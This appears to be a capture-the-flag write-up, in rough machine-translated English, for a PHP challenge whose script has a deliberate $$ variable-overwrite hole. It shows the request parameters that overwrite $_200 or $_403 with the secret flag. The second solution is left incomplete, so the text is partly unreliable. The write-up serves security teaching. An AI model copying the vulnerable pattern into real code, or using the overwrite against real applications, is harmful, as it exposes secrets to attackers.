PHP_Code_Challenge-7 - $$ variables covered

topic

<?php
include "flag.php";
$_403 = "Access Denied";
$_200 = "Welcome Admin";
if ($_SERVER["REQUEST_METHOD"] != "POST")
    die("BugsBunnyCTF is here :p...");
if ( !isset($_POST["flag"]) )
    die($_403);
foreach ($_GET as $key => $value)
    $$key = $$value;
foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($_403);
echo "This is your flag : ". $flag . "\n";
die($_200);

analysis

if ($_SERVER["REQUEST_METHOD"] != "POST")
    die("BugsBunnyCTF is here :p...");

It must be a POST request method

if ( !isset($_POST["flag"]) )
    die($_403);

POST requires a variable named flag of

foreach ($_GET as $key => $value)
    $$key = $$value;
foreach ($_POST as $key => $value)
    $$key = $value;

$$ variables covering
the first foreach, the value of any variable can impart any variable
second foreach at any given value of the input variable can

if ( $_POST["flag"] !== $flag )
    die($_403);
echo "This is your flag : ". $flag . "\n";
die($_200);

$_POST["flag"]And if $flagnot exactly equal, i.e., when value types, and outputs $_403
if exactly equal, the output $flag, and$_200

Try the situation got to try POST

Obviously this is not the flag 1
Looking back at the above variables covered, foreach ($_POST as $key => $value)$$key = $value;
when only a POST variable flag value of 1, $$key = $valu=> $flag = 1, the variables that might otherwise exist flag is assigned to $ 1, that is true flag is modified to the value of the variable flag Since the first two if, this can not be changed
so require real flag before its value is modified to other variables and can output it
can output only die($_403);and die($_200);so the idea is to use a variable to be covered in the flag changed before the true $flagvalue coverage $_403or $_200and outputs
and can take advantage of variable cover the value of a variable other variables covering only the first place at a foreach

Knowledge Point

$$ variable coverage

solution

$_200

The real flag covering $_200and output$_200

$_GET['_200']='flag';
$_POST['flag']=1;

foreach ($_GET as $key => $value)
    $$key = $$value;

Equivalent $_200=$flag, it will give the true flag$_200

foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($_403);

$flag1 is modified, the $_POST['flag']type and the like equivalent, is not satisfied$_POST["flag"] !== $flag

echo "This is your flag : ". $flag . "\n";
die($_200);

Output $_200that is true flag output

$_403

The real flag covering $_403and constructed so that $_403energy output

$_GET['_403']=flag&$_GET["_POST['flag']"]=2
$_POST['flag']=1;

foreach ($_GET as $key => $value)
    $$key = $$value;

Corresponds $_403=$flag, to the flag to true $_403, as well $_POST['flag']=$2, $2does not exist, i.e. $_POST['flag']is empty [actual code should be given]

foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($_403);

$flag1 is modified, and the $_POST['flag']ranges to meet the $_POST["flag"] !== $flagoutput$_403